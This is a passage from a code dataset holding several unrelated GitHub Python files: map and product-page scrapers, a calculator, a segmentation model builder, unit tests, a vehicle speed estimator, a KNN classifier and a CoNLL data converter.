GMapScraper(webapp.RequestHandler):\n\tdef get(self):\n\t\turl = self.request.get("url")\n\t\tquery = "select script from html where url=\"http://maps.google.com/maps/ms?ie=UTF8&hl=en&msa=0&ll=-3.073324,37.411366&spn=0.126847,0.245819&t=h&z=13&msid=116890249293007182618.00048088bb3d7fc8d89e1\""\n\t\tresults = helpers.do_yql(query)['query']['results']['body']\n\t\tfor result in results:\n\t\t\titem = str(result['script']['content'])\n\t\t\tif "KEOB" in item:\n\t\t\t\tthings = item.split("KEOB")\n\t\t\t\tgeoelements = things[1].split("@")\n\t\t\t\tmessageelements = things[3].split("@")\n\t\t\t\tlatlng = geoelements[1][0:geoelements[1].find("\"")]\n\t\t\t\tlat = latlng.split(",")[0]\n\t\t\t\tlng = latlng.split(",")[1]\n\t\t\t\tmessagebits = 
messageelements[1].replace("\",infoWindow:{title:\"", "").replace("\\", "").replace("x3c", "").replace("x3e", "").replace("/div", "").replace("\n", " ").split(":brbr")\n\t\t\t\tself.response.out.write(lat)\n\t\t\t\tself.response.out.write("<br/>")\t\t\t\n\t\t\t\tself.response.out.write(lng)\n\t\t\t\tself.response.out.write("<br/>")\t\t\t\n\t\t\t\tself.response.out.write("<br/>")\n\t\t\t\tnote = "From TeamKilimanjaro Guides<br/>" + messagebits[1].strip() + "<br/>" + messagebits[0].strip()\n\t\t\t\tself.response.out.write(note)\n\t\t\t\tself.response.out.write("<br/>")\t\t\t\n\t\t\t\tself.response.out.write("<br/>
\")\n\t\t\t\tkeyhash = hashlib.md5(lat + lng).hexdigest();\n\t\t\t\tlocation = models.Location.get_or_insert(keyhash, lat=lat, lng=lng, note=note)\n\t\t\t\tgeolist = models.List.get_or_insert(\"geolist\", list=[])\n\t\t\t\tif keyhash not in geolist.list:\n\t\t\t\t\tgeolist.list.append(keyhash)\n\t\t\t\t\tnewsitem = models.NewsItem.get_or_insert(keyhash, text=note)\n\n\t\t\t\t\n\t\t\t\t\n","repo_name":"christhorpe/childsiklimb-live","sub_path":"geo.py","file_name":"geo.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37773113197","text":"def readNumber(line, index): \n number = 0\n while index < len(line) and line[index].isdigit():\n number = number * 10 + int(line[index])\n index += 1\n if index < len(line) and line[index] == '.':\n index += 1\n keta = 0.1\n while index < len(line) and line[index].isdigit():\n number += int(line[index]) * keta\n keta /= 10\n index += 1\n token = {'type': 'NUMBER', 'number': number}\n return token, index\n\ndef readPlus(line, index):\n token = {'type': 'PLUS'}\n return token, index + 1\n\ndef readMinus(line, index):\n token = {'type': 'MINUS'}\n return token, index + 1\n\ndef readTimes(line, index):\n token = {'type': 'TIMES'}\n return token, index + 1\n\ndef readDivision(line, index):\n token = {'type': 'DIVISION'}\n return token, index + 1 \n\ndef tokenize(line): \n tokens = []\n index = 0\n while index < len(line):\n if line[index].isdigit():\n (token, index) = readNumber(line, index)\n elif line[index] == '+':\n (token, index) = readPlus(line, index)\n elif line[index] == '-':\n (token, index) = readMinus(line, index)\n elif line[index] == '*':\n (token, index) = readTimes(line, index) \n elif line[index] == '/':\n (token, index) = readDivision(line, index) \n else:\n print('Invalid character found: ' + line[index])\n exit(1)\n tokens.append(token)\n #print(tokens)\n return tokens\n\ndef evaluate_first(tokens):\n answer = 1\n tokens.insert(0, {'type': 'TIMES'}) # Insert a dummy '*' token\n index = 1\n while index < len(tokens):\n #print(index)\n if tokens[index]['type'] == 'NUMBER':\n if tokens[index - 1]['type'] == 'TIMES':\n answer *= tokens[index]['number']\n tokens[index-1]['type'] = 'PLUS'\n tokens[index]['number'] = 0\n elif tokens[index - 1]['type'] == 'DIVISION':\n answer /= tokens[index]['number']\n tokens[index-1]['type'] = 'PLUS'\n tokens[index]['number'] = 0\n elif tokens[index - 1]['type'] == 'PLUS' or tokens[index-1]['type'] == 'MINUS':\n tokens[index-2]['type'] = 'NUMBER'\n tokens[index-2]['number'] = answer\n answer = tokens[index]['number']\n if (index!=len(tokens)-1) and (tokens[index+1]['type'] == 'TIMES' or tokens[index+1]['type'] == 'DIVISION'):\n tokens[index]['number'] = 0\n else:\n print('Invalid syntax')\n exit(1)\n # print(tokens)\n # print(answer)\n # print(\"=\"*10)\n index += 1\n tokens[index-1]['type'] = 'NUMBER'\n tokens[index-1]['number'] = answer\n #print(tokens)\n return tokens\n\ndef evaluate_second(tokens):\n answer = 0\n if tokens[0] != {'type': 'PLUS'}:\n tokens.insert(0, {'type': 'PLUS'}) # Insert a dummy '+' token\n index = 1\n while index < len(tokens):\n if tokens[index]['type'] == 'NUMBER':\n if tokens[index - 1]['type'] == 'PLUS':\n answer += tokens[index]['number']\n elif tokens[index - 1]['type'] == 'MINUS':\n answer -= tokens[index]['number']\n else:\n print('Invalid syntax')\n exit(1)\n index += 1\n return answer\n\ndef test(line):\n tokens = tokenize(line)\n # print(\"~\"*10)\n # print(tokens)\n # 
print(\"~\"*10)\n #actualAnswer = evaluate_first(tokens)\n if '*' in line or '/' in line:\n #print(\"OK\")\n tokens = evaluate_first(tokens)\n answer = evaluate_second(tokens)\n print(\"answer:%s\" % answer)\n return answer\n\nwhile True:\n print('> ', end=\"\")\n line = input()\n #tokens = tokenize(line)\n answer = test(line)\n #print(\"answer = %f\\n\" % answer)\n\n","repo_name":"akaidaruma/hw3","sub_path":"calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25433773845","text":"import os\nfrom .model import DeepLabv2_MSC\nimport types\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom torchvision import transforms\n# from .utils import *\nimport numpy as np\nimport json\nimport matplotlib.pyplot as plt\n\n\ndef build(config_path: str = '') -> nn.Module:\n \"\"\"Builds a pytorch compatible deep learning model\n\n The model can be used as any other pytorch model. Additional methods\n for `preprocessing`, `postprocessing`, `label_to_class` have been added to ease handling of the model\n and simplify interchangeability of different models.\n \"\"\"\n # Load Config file\n if not config_path: # If no config path then load default one\n config_path = os.path.join(os.path.realpath(os.path.dirname(__file__)), \"config.json\")\n\n with open(config_path, 'r') as f:\n config = json.load(f)\n \n # Load the classes\n classes_path = os.path.join(os.path.realpath(os.path.dirname(__file__)), config['classes_path'])\n \n with open(classes_path, 'r') as f:\n classes = json.load(f)\n\n # Set up model\n model = DeepLabv2_MSC(classes, config['n_blocks'], config['atrous_rates'], config['scales'] )\n weights_path = os.path.join(os.path.realpath(os.path.dirname(__file__)), config['weights_path'])\n model.load_state_dict(torch.load(weights_path), strict=True)\n\n \n model.postprocess = types.MethodType(postprocess, model)\n model.preprocess = types.MethodType(preprocess, model)\n setattr(model, 'classes', classes)\n setattr(model, 'config', config)\n\n return model\n\ndef preprocess(self, img: Image):\n \"\"\"Converts PIL Image into pytorch tensor specific to this model\n\n Handles all the necessary steps for preprocessing such as resizing, normalization.\n\n Args:\n img (PIL.Image): input image\n \"\"\"\n\n # Resize: for PIL image Image.size --> (width, height)\n scale = self.config['input_size'][0] / max(img.size[:2])\n \n input_width = min([int(img.size[0] * scale), self.config['input_size'][0]])\n input_height = min([int(img.size[1] * scale), self.config['input_size'][0]])\n \n input_img = img.resize((input_width, input_height), resample=Image.BILINEAR)\n input_img = np.array(input_img.convert(\"RGB\"))\n \n # image = cv2.resize(image, dsize=None, fx=scale, fy=scale)\n # raw_image = image.astype(np.uint8)\n\n # Original image was loaded with cv2 --> BGR\n input_img = input_img[:,:,::-1]\n\n # Subtract mean values\n input_img = input_img.astype(np.float32)\n input_img -= np.array(\n [\n float(self.config['mean_RGB'][2]),\n float(self.config['mean_RGB'][1]),\n float(self.config['mean_RGB'][0]),\n ]\n )\n\n # Convert to torch.Tensor and add \"batch\" axis\n input_img = torch.from_numpy(input_img.transpose(2, 0, 1)).float().unsqueeze(0)\n\n return input_img\n\ndef postprocess(self, detections: torch.Tensor, img: Image, visualize: bool = False):\n \"\"\"Converts pytorch tensor into interpretable 
format\n\n Handles all the steps for postprocessing of the raw output of the model.\n Depending on the rocket family there might be additional options.\n\n Args:\n detections (Tensor): Output Tensor to postprocess\n input_img (PIL.Image): Original input image which has not been preprocessed yet\n visualize (bool): If True outputs image with annotations else a list of bounding boxes\n \"\"\"\n # Get the size of the input_img\n scale = self.config['input_size'][0] / max(img.size[:2])\n \n input_width = min([int(img.size[0] * scale), self.config['input_size'][0]])\n input_height = min([int(img.size[1] * scale), self.config['input_size'][0]])\n \n input_img = img.resize((input_width, input_height), resample=Image.BILINEAR)\n input_img = np.array(input_img.convert(\"RGB\"))\n raw_image = input_img.astype(np.uint8)\n\n H = input_height\n W = input_width\n\n # Image -> Probability map\n logits = F.interpolate(detections, size=(H, W), mode=\"bilinear\", align_corners=False)\n probs = F.softmax(logits, dim=1)[0]\n probs = probs.cpu().numpy()\n\n # Refine the prob map with CRF\n # if postprocessor and raw_image is not None:\n # probs = postprocessor(raw_image, probs)\n\n labelmap = np.argmax(probs, axis=0)\n \n labels = np.unique(labelmap)\n \n dict_mask = {}\n\n for i, label in enumerate(labels):\n mask = labelmap == label\n dict_mask[self.classes[str(label)]] = mask.astype(np.float32)\n\n if visualize:\n visible_labels = dict_mask.keys()\n \n # Show result for each class\n rows = np.floor(np.sqrt(len(visible_labels) + 1))\n cols = np.ceil((len(visible_labels) + 1) / rows)\n\n plt.figure(figsize=(10, 10))\n ax = plt.subplot(rows, cols, 1)\n ax.set_title(\"Input image\")\n ax.imshow(raw_image)\n ax.axis(\"off\")\n\n for i, label in enumerate(visible_labels):\n mask = dict_mask[label]\n ax = plt.subplot(rows, cols, i + 2)\n ax.set_title(label)\n ax.imshow(raw_image)\n ax.imshow(mask, 'jet', alpha=0.5)\n ax.axis(\"off\")\n\n plt.tight_layout()\n plt.show()\n\n # Convert the figure to a PIL image\n # # draw the renderer\n # fig.canvas.draw ( )\n \n # # Get the RGBA buffer from the figure\n # w,h = fig.canvas.get_width_height()\n # buf = numpy.fromstring ( fig.canvas.tostring_argb(), dtype=numpy.uint8 )\n # buf.shape = ( w, h,4 )\n \n # # canvas.tostring_argb give pixmap in ARGB mode. 
Roll the ALPHA channel to have it in RGBA mode\n    #     buf = numpy.roll ( buf, 3, axis = 2 )\n\n\n\n\n    # line_width = 2\n    # img_out = input_img\n    # ctx = ImageDraw.Draw(img_out, 'RGBA')\n    # for detection in list_detections:\n    #     # Extract information from the detection\n    #     topLeft = (detection['topLeft_x'], detection['topLeft_y'])\n    #     bottomRight = (detection['topLeft_x'] + detection['width'] - line_width, detection['topLeft_y'] + detection['height']- line_width)\n    #     class_name = detection['class_name']\n    #     bbox_confidence = detection['bbox_confidence']\n    #     class_confidence = detection['class_confidence']\n\n    #     # Draw the bounding boxes and the information related to it\n    #     ctx.rectangle([topLeft, bottomRight], outline=(255, 0, 0, 255), width=line_width)\n    #     ctx.text((topLeft[0] + 5, topLeft[1] + 10), text="{}, {:.2f}, {:.2f}".format(class_name, bbox_confidence, class_confidence))\n\n    # del ctx\n    # return img_out\n\n    return dict_mask\n\n","repo_name":"Rocketbase-AI/rockets-deeplabv2","sub_path":"rocket_builder.py","file_name":"rocket_builder.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16981653901","text":"from my_funcs.utils import division\nimport pytest\n\n\n@pytest.mark.parametrize("divider_one, divider_two, expected_result", [\n    (10, 2, 5),\n    (20, 10, 2),\n    (30, -3, -10),\n    (5, 2, 2.5),\n])\ndef test_division_good(divider_one, divider_two, expected_result):\n    assert division(divider_one, divider_two) == expected_result\n\n\n@pytest.mark.parametrize("error_expected, divider_mistake", [\n    (ZeroDivisionError, 0),\n    (TypeError, "0"),\n])\ndef test_division_error(error_expected, divider_mistake):\n    with pytest.raises(error_expected):\n        division(10, divider_mistake)\n","repo_name":"Dinislam-Y/luchanos_pytest","sub_path":"tests/test_division_func.py","file_name":"test_division_func.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15019863757","text":"import numpy as np\nimport numpy.fft as nf  # used for the convolution in filtering\n# from guage.get_camera_parameters import location  # improved distance-measurement method\nimport math\n\n'''Original distance-measurement method'''\ndef location(height, width, X, Y):\n    '''\n    height :image's height\n    width :image's width\n    X,Y: image's centerpoint\n    '''\n    # Camera parameters: pitch angle Alpha (deg), vertical FOV Theta (deg), horizontal FOV Beta (deg), camera height H (m), distance from the bottom edge of the frame to the camera D_min (m), distance from the top edge to the camera D_max (m).\n    Alpha = 90.0\n    Theta = 55.3\n    Beta = 87.0\n    H = 7.2\n    D_min = H * math.tan((Alpha - Theta / 2) / 180 * math.pi)\n    W = 2 * D_min * math.tan((Beta / 2) / 180 * math.pi)\n    L1 = W * (width + 1 - (float(X) - 1 / 2)) / width  # intermediate variable\n    L2 = H * (float(height + 1 - Y) - 1 / 2) / height  # intermediate variable\n    Xm = (L1 - W / 2) * L2 / (H - L2) + L1  # world coordinate\n    Ym = D_min * L2 / (H - L2)  # world coordinate\n    loc = np.array([Xm, Ym])\n    return loc\n\n\n'''\nInputs of velocity_estimate:\nid is the id of the detected vehicle, frame_idx is the current frame of the video, (x, y) are the vehicle's pixel coordinates, (height, width) are the image height and width;\nnp_store is the stored data, sheet is used to export the velocity series to an Excel sheet.\n'''\n\n\ndef velocity_estimate(id, frame_idx, x, y, height, width, np_store, sheet):\n    how_many_frame_will_detect = 45\n    video_frame_rate = 60  # video frame rate\n    point = 7  # store data for point time instants\n    distance_point = np.zeros(point - 1)\n    velocity_point = np.zeros(point - 1)\n    loc = np.zeros((2, point))\n    hn = np.zeros(17)  # used for filtering\n    # for i in range(17):  # set the filter response coefficients\n    #     if i == 8:\n    #         hn[i] = 9 / 16\n    #     else:\n    #         hn[i] = math.sin(math.pi * 9 / 16 * (i - 8)) / (math.pi * (i - 8)) * (\n    #                 0.54 - 0.46 * (math.cos(math.pi * i / 8)))\n    # If the variables used for storage are too small, enlarge them (begin)\n    if id > np_store.shape[0]:\n        np_store = np.vstack((np_store, np.zeros((500, 2 * point + 2))))\n    if id + 1 > sheet.shape[1]:\n        sheet = np.hstack((sheet, np.zeros((sheet.shape[0], 10))))\n    if int(frame_idx / how_many_frame_will_detect) > sheet.shape[0]:\n        sheet = np.vstack((sheet, np.zeros((10, sheet.shape[1]))))\n    # If the variables used for storage are too small, enlarge them (end)\n    if frame_idx % how_many_frame_will_detect == 2:\n        for j in range(2 * point - 2):  # when point is 7, loop 12 times, shifting the X/Y coordinates of the later store entries to the earlier ones\n            np_store[id][j + 2] = np_store[id][j + 4]  # the first two columns stay unchanged; the last two columns are changed outside the loop\n        np_store[id][2 * point] = x  # when point is 7, this entry is np_store[i][14]\n        np_store[id][2 * point + 1] = y  # # when point is 7, this entry is np_store[i][15]\n        print('fi', frame_idx)\n\n    # If the frame count is below the threshold, fewer than point-1 intervals are stored, so the average divides by the current number of stored intervals\n    if (frame_idx >= how_many_frame_will_detect + 2) and (frame_idx < (point - 1) * how_many_frame_will_detect + 2):\n        sheet[int(frame_idx / how_many_frame_will_detect) - 1][0] = \\n            frame_idx * (how_many_frame_will_detect / video_frame_rate) / how_many_frame_will_detect\n        for j in range(int(frame_idx / how_many_frame_will_detect) + 1):\n            loc[:, int(point - (j + 1))] = \\n                location(height, width, np_store[id][int(2 * point) - 2 * j], np_store[id][int(2 * point) + 1 - 2 * j])\n        for k in range(int(frame_idx / how_many_frame_will_detect)):\n            distance_point[k] = math.sqrt(sum(np.square(loc[:, point - (k + 1)] - loc[:, point - (k + 2)])))\n            velocity_point[k] = distance_point[k] / (how_many_frame_will_detect / video_frame_rate)\n        xn = velocity_point[0:int(frame_idx / how_many_frame_will_detect)]\n        # N1 = len(xn)  # convolution filtering (begin)\n        # N2 = len(hn)\n        # N = N1 + N2\n        # Yk = np.zeros(N)\n        # Yk = nf.fft(Yk)\n        # xnn = np.hstack((xn, np.zeros(N - N1)))\n        # hnn = np.hstack((hn, np.zeros(N - N2)))\n        # Xk = nf.fft(xnn)\n        # Hk = nf.fft(hnn)\n        # for j in range(N):\n        #     Yk[j] = Xk[j] * Hk[j]\n        # yn = nf.ifft(Yk)\n        # yn = np.abs(yn)  # convolution filtering (end)\n        # yn = yn.tolist()\n        # yn0 = yn[int(N2 / 2):int(N2 / 2) + N1]\n        # yn_mean = np.mean(yn0)\n        yn_mean = np.mean(xn)\n        velocity = yn_mean / (how_many_frame_will_detect / video_frame_rate)\n        sheet[int(frame_idx / how_many_frame_will_detect) - 1][id + 1] = velocity * 3.6\n        if (velocity > 40) or (velocity < 0.2):  # check whether the velocity is credible\n            try:\n                velocity = np_store[id][1]\n            except:\n                velocity = 0\n        else:\n            np_store[id][1] = velocity  # store the credible velocity\n    elif frame_idx >= (point - 1) * how_many_frame_will_detect + 2:  # if the frame count exceeds the threshold, divide by point-1 for the average\n        sheet[int(frame_idx / how_many_frame_will_detect) - 1][0] = frame_idx / how_many_frame_will_detect\n        for j in range(0, 2 * point, 2):  # step 2; when point is 7, loc has 7 elements\n            loc[:, int(j / 2)] = location(height, width, np_store[id][j + 2], np_store[id][j + 3])\n        for k in range(point - 1):  # when point is 7, distance_point has 6 elements\n            distance_point[k] = math.sqrt(sum(np.square(loc[:, k + 1] - loc[:, k])))\n            velocity_point[k] = distance_point[k] / (how_many_frame_will_detect / video_frame_rate)\n        xn = velocity_point\n        # N1 = len(xn)\n        # N2 = len(hn)\n        # N = N1 + N2\n        # Yk = np.zeros(N)\n        # Yk = nf.fft(Yk)\n        # xnn = np.hstack((xn, np.zeros(N - N1)))\n        # hnn = np.hstack((hn, np.zeros(N - N2)))\n        # Xk = nf.fft(xnn)\n        # Hk = nf.fft(hnn)\n        # for j in range(N):\n        #     Yk[j] = Xk[j] * Hk[j]\n        # yn = nf.ifft(Yk)\n        # yn = np.abs(yn)\n        # yn = yn.tolist()\n        # yn0 = yn[int(N2/2):int(N2/2)+N1]\n        # yn0 = sorted(yn0)\n        # yn0.remove(yn0[0])\n        # yn0.remove(yn0[-1])\n        xn = xn.tolist()\n        xn = sorted(xn)\n        xn.remove(xn[0])\n        xn.remove(xn[-1])\n        yn_mean = np.mean(xn)\n        velocity = yn_mean / (how_many_frame_will_detect / video_frame_rate)\n        sheet[int(frame_idx / how_many_frame_will_detect) - 1][id + 1] = velocity * 3.6\n        if (velocity > 40) or (velocity < 0.2):  # check whether the velocity is credible\n            try:\n                velocity = np_store[id][1]\n            except:\n                velocity = 0\n        else:\n            np_store[id][1] = velocity\n    else:\n        velocity = 0\n\n    return velocity, np_store, sheet\n","repo_name":"beturer/yolov5_deepsort_fore","sub_path":"velocity_estimate.py","file_name":"velocity_estimate.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71431084648","text":"# https://archive.ics.uci.edu/ml/datasets/pima+indians+diabetes \nimport pandas as pd\nimport numpy as np\nfrom sklearn import model_selection, neighbors\n#to the uci dataset we add the attributes row and then use that in this example.\ndf= pd.read_csv('dataset/prima-indians-diabetes.txt')\n\nx= np.array(df.drop(['Class variable'],1))\ny= np.array(df['Class variable'])\n\nx_train, x_test, y_train, y_test= model_selection.train_test_split(x,y,test_size=0.2)\n\nclf=neighbors.KNeighborsClassifier()\n#IF K NOT MENTIONED , AUTOMATICALLY TAKE K AS 5\nclf.fit(x_train, y_train)\n\naccuracy=clf.score(x_test,y_test)\nprint(accuracy)\n#0.74025974026\n","repo_name":"gagicha/machine_learning","sub_path":"diabetes classification(KNN).py","file_name":"diabetes classification(KNN).py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21259469508","text":"import show_tree as ST\nimport pre_script_semeval\nimport stanford_pos\nimport parse\nimport subprocess\nimport os\nreload(ST)\n\ndef conll_format(a, g, w, parents_list, deprels_list, postags_list, filename):\n    '''\n    INPUT:\n    a :: aspect\n    g :: opinion\n    w :: corresponding words\n    '''\n    out = ''\n    for aspect, opinion, sw, pa, de, pt in zip(a, g, w, parents_list, deprels_list, postags_list):\n        for asp, opi, w, parent, deprel, postag in zip(aspect, opinion, sw, pa, de, pt):\n            out += w + ' ' + asp + ' ' + opi + ' ' + parent + ' ' + deprel +' ' + postag + '\n'\n        out += '\n'\n    f = open(filename,'w')\n    f.writelines(out)\n    f.close()\n\ndef train_test_save(direc, data, Type=''):\n    tokens_list = []\n    aspects_list = []\n    opinions_list = []\n    parents_list = []\n    deprels_list = []\n    postags_list = []\n\n    with open(direc + data + '.toks'+Type, 'r') as fin1, open(direc + data + '.label.raw'+Type, 'r') as fin2,\\n        open(direc + data + '.opinion.raw' + Type, 'r') as fin3, open(direc + data + '.parents' + Type, 'r') as fin4,\\n        open(direc + data + '.rels' + Type, 'r') as fin5, open(direc + data + '.pos_tag' + Type, 'r') as fin6:\n        for line1 in fin1:\n            tokens = line1.strip().split()\n            tokens_list.append(tokens)\n        for line2 in fin2:\n            aspects = line2.strip().split()\n            aspects_list.append(aspects)\n        for line3 in fin3:\n            opinions = line3.strip().split()\n            opinions_list.append(opinions)\n        for line4 in fin4:\n            parents = line4.strip().split()\n            parents_list.append(parents)\n        for line5 in fin5:\n            deprels = line5.strip().split()\n            deprels_list.append(deprels)\n        for line6 in fin6:\n            postags = line6.strip().split()\n            postags_list.append(postags)\n\n    save_data_dir = direc\n    if not os.path.exists(save_data_dir):\n        os.mkdir(save_data_dir)\n    pred_file_name = save_data_dir+ data + '.conll'+Type\n    conll_format(aspects_list, opinions_list, tokens_list, parents_list, deprels_list, postags_list, pred_file_name)\n\nif __name__ == '__main__':\n    datasets = ['rest', 'laptop', 'restaurant'] #'laptop', 'restaurant'\n\n    for 
dataset in datasets:\n direc = '../data/' + dataset + '/'\n data = dataset\n\n if not os.path.exists(direc + data + '.toks'+'_train'):\n pre_script_semeval.main(dataset)\n stanford_pos.main(dataset, Type='_train')\n stanford_pos.main(dataset, Type='_test')\n parse.main(dataset, Type='_train')\n parse.main(dataset, Type='_test')\n train_test_save(direc, data, Type='_train')\n train_test_save(direc, data, Type='_test')\n\n\n","repo_name":"wuwenyan2018/Double-propagation","sub_path":"conll_format_opinion_target.py","file_name":"conll_format_opinion_target.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3962067310","text":"from requests_html import HTMLSession\nimport translators as ts\nimport csv\nimport re\nimport time\n\n\n\nurl = 'https://ecoxtrem.com/e-motos'\n\ndatasources =[]\ndatasourcesFormated =[]\nimagesources =[]\nstringa =''\nresultFr =[]\nresultFrN = []\nresultEs =[]\nmy_dict =[]\nCategories = \"E-motos\"\ns = HTMLSession()\nfullTs=''\ndef nth_repl(s, sub, repl, n):\n find = s.find(sub)\n # If find is not -1 we have found at least one match for the substring\n i = find != -1\n # loop util we find the nth or we find no match\n while find != -1 and i != n:\n # find + 1 means we start searching from after the last match\n find = s.find(sub, find + 1)\n i += 1\n # If i is equal to n we found nth match so replace\n if i == n:\n return s[:find] + repl + s[find+len(sub):]\n return s\n\ndef get_links(url):\n r = s.get(url)\n items = r.html.find('div.pro_outer_box.clearfix.home_default')\n links = []\n for item in items:\n links.append(item.find('a', first=True).attrs['href'])\n return links\n\ndef get_product_images(imagelink):\n r = s.get(imagelink)\n mainImages = r.html.find('div.images-container-0 picture img.pro_gallery_item')\n for item in mainImages:\n try:\n imagesources.append(item.attrs['data-src'])\n except IndexError:\n imagesources.append(item.attrs['srcset'])\n return imagesources\n\n \n\n\ndef get_productdata(link):\n r = s.get(link)\n title = r.html.find('h1', first=True).full_text\n title = ts.google(title, from_language = 'es', to_language='fr')\n \n \n try:\n price = r.html.find('div.current-price span')[0].full_text\n except IndexError:\n price = '0'\n try:\n regularprice = r.html.find('div.current-price span')[2].full_text\n except IndexError:\n regularprice = '0'\n \n \n desc = r.html.find('div.st_read_more_box p', first=True).full_text\n desc = ts.google(desc, from_language = 'es', to_language='fr')\n try:\n fulldesc = str(r.html.find('div.st_read_more_box')[1].html)\n except IndexError:\n fulldesc = str(r.html.find('div.st_read_more_box')[0].html)\n \n mainImages = r.html.find('div.images-container-0 picture img.pro_gallery_item')\n attributeNames = r.html.find('div.tab-pane-body section.product-features dt.name')\n attributeValues = r.html.find('div.tab-pane-body section.product-features dd.value')\n # my_dict[attributeNames]=attributeValues\n fulldesc = fulldesc.replace(\"\\n\", \" \").strip()\n fulldesc = fulldesc.replace(\";\", \" \")\n # sku = r.html.find('span.sku', first=True).full_text\n \n datasources =[]\n for item in mainImages:\n try:\n datasources.append(item.attrs['srcset'])\n except:\n datasources.append(item.attrs['data-src'])\n \n\n listToStr = ', '.join([str(elem) for elem in datasources])\n # listToStr = listToStr.replace(\"https://ecoxtrem.com\", \"http://localhost/easywpslider/wp-content/uploads/2021/06\")\n stringa = 
listToStr.split(\"/\", -1)\n stringa = stringa[4].split(\",\", -1)\n\n stringa = listToStr.replace( \"/\"+stringa[0], \".jpg\")\n stringa = stringa.replace(\"https://ecoxtrem.com\", \"http://localhost/easywpslider/wp-content/uploads/2021/06\")\n \n \n fulldesc = str(fulldesc)\n \n \n \n s1 = fulldesc[:len(fulldesc)//2]\n s2 = fulldesc[len(fulldesc)//2:]\n s1T = ts.google(s1, from_language = 'auto', to_language='fr', if_ignore_limit_of_length=True)\n s2T = ts.google(s2, from_language = 'auto', to_language='fr', if_ignore_limit_of_length=True) \n Category = ts.google(Categories, from_language = 'auto', to_language='fr')\n fullTransDesc = s1T + s2T\n # fullTransDesc = fullTransDesc.replace('src = \"', 'src =\"')\n fullTransDesc = re.sub(r'src = \"', r'src =\"', fullTransDesc)\n\n resultEs = re.findall(r'src=\"(.*?)\"', fulldesc)\n # resultFr = re.findall(r'src =\"(.*?)\"', fullTransDesc)\n resultFr = re.findall(r'src(.*?)https(.*?)\"', fullTransDesc)\n\n # resultTags = re.findall(r'\\s*(<.+?>)\\s*', fullTransDesc)\n # toCorrect = [\"\", \"\", \"\"]\n\n \n for value in resultFr:\n str1 =value\n resultFrN.append(value)\n \n for fr,es in zip(resultFrN, resultEs):\n # Replace key character with value character in string\n fullTs = ''.join(fullTransDesc.replace(fr[1], es))\n \n \n\n \n fullTransDesc = fullTransDesc.replace(\"Div\", \"div\")\n fullTransDesc = fullTransDesc.replace(\"la classe\", \"class\")\n fullTransDesc = fullTransDesc.replace(\"col-MD-6\", \"col-md-6\")\n fullTransDesc = fullTransDesc.replace(\"H2\", \"h2\")\n fullTransDesc = fullTransDesc.replace(\"
<Div>", "<div>")\n    fullTransDesc = fullTransDesc.replace("</P>", "</p>")\n    fullTransDesc = fullTransDesc.replace("</H2>", "</h2>")\n    fullTransDesc = fullTransDesc.replace("<B>", "<b>")\n    fullTransDesc = fullTransDesc.replace("H3", "h3")\n    fullTransDesc = fullTransDesc.replace("</B>", "</b>")\n    fullTransDesc = fullTransDesc.replace("<Ul>", "<ul>")\n    fullTransDesc = fullTransDesc.replace("<Li>", "<li>")\n    fullTransDesc = fullTransDesc.replace("<LI>", "<li>")\n    fullTransDesc = fullTransDesc.replace("<Li >", "<li>")\n    fullTransDesc = fullTransDesc.replace("<LI >", "<li>")\n    fullTransDesc = fullTransDesc.replace("<li >", "<li>")\n    fullTransDesc = fullTransDesc.replace("< / Li>", "</li>")\n    fullTransDesc = fullTransDesc.replace("<Li/>", "<li>")\n    fullTransDesc = fullTransDesc.replace("<li/>", "<li>")\n    fullTransDesc = fullTransDesc.replace("</Li>", "</li>")\n    fullTransDesc = fullTransDesc.replace("<I>", "<i>")\n    fullTransDesc = fullTransDesc.replace("classe", "class")\n    fullTransDesc = fullTransDesc.replace("</Ul>", "</ul>")\n    fullTransDesc = fullTransDesc.replace("mas =", "class=")\n    fullTransDesc = fullTransDesc.replace("<LI/>", "<li>")\n    fullTransDesc = fullTransDesc.replace("< Li>", "<li>")\n    fullTransDesc = fullTransDesc.replace("< / div>", "</div>")\n    fullTransDesc = fullTransDesc.replace("<Strong>", "<strong>")\n    fullTransDesc = fullTransDesc.replace("</Strong>", "</strong>")\n    fullTransDesc = fullTransDesc.replace("< / p>", "</p>
        \")\n\n\n # print(fullTransDesc)\n # print(fulldesc)\n \n\n # product = {}\n product = {'ID':'',\n 'Type':'simple',\n 'SKU':'',\n 'Name':title.strip(),\n 'Published':1,\n '\"Is featured?\"':0,\n '\"Visibility in catalog\"':'visible',\n '\"Short description\"':desc.strip(),\n 'Description':fullTransDesc,\n '\"Date sale price starts\"':'',\n '\"Date sale price ends\"':'',\n '\"Tax status\"':'taxable',\n '\"Tax class\"':'',\n '\"In stock?\"':1,\n 'Stock':'',\n '\"Low stock amount\"':'',\n '\"Backorders allowed?\"':0,\n '\"Sold individually?\"':0,\n '\"Weight (kg)\"':'',\n '\"Length (cm)\"':'',\n '\"Width (cm)\"':'',\n '\"Height (cm)\"':'',\n '\"Allow customer reviews?\"':1,\n '\"Purchase note\"':'',\n '\"Sale price\"':price.replace('€', '').strip(),\n '\"Regular price\"':regularprice.replace('€', '').strip(),\n 'Categories':Category,\n 'Tags':'',\n '\"Shipping class\"':'',\n 'Images':stringa,\n '\"Download limit\"':'',\n '\"Download expiry days\"':'',\n 'Parent':'',\n '\"Grouped products\"':'',\n 'Upsells':'',\n 'Cross-sells':'',\n '\"External URL\"':'',\n '\"Button text\"':'',\n 'Position':0,\n 'Attribute 1 name':'',\n 'Attribute 1 value(s)':'',\n 'Attribute 